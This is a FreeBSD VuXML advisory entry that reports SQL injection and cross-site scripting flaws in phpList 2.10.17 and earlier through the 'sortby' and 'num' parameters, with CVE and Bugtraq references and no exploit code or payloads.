FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

phpList -- SQL injection and XSS vulnerability

Affected packages
phplist <= 2.10.17

Details

VuXML ID fd8bac56-c444-11e1-864b-001cc0877741
Discovery 2012-03-21
Entry 2012-07-02

Zero Science Lab reports:

Input passed via the parameter 'sortby' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param 'num' is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user's browser session in context of an affected site.

[source]

References

Bugtraq ID 52657
CVE Name CVE-2012-2740
CVE Name CVE-2012-2741
URL http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php
URL https://www.phplist.com/?lid=567

Copyright © 2003-2005 Jacques Vidrine and contributors.
Please see the source of this document for full copyright information.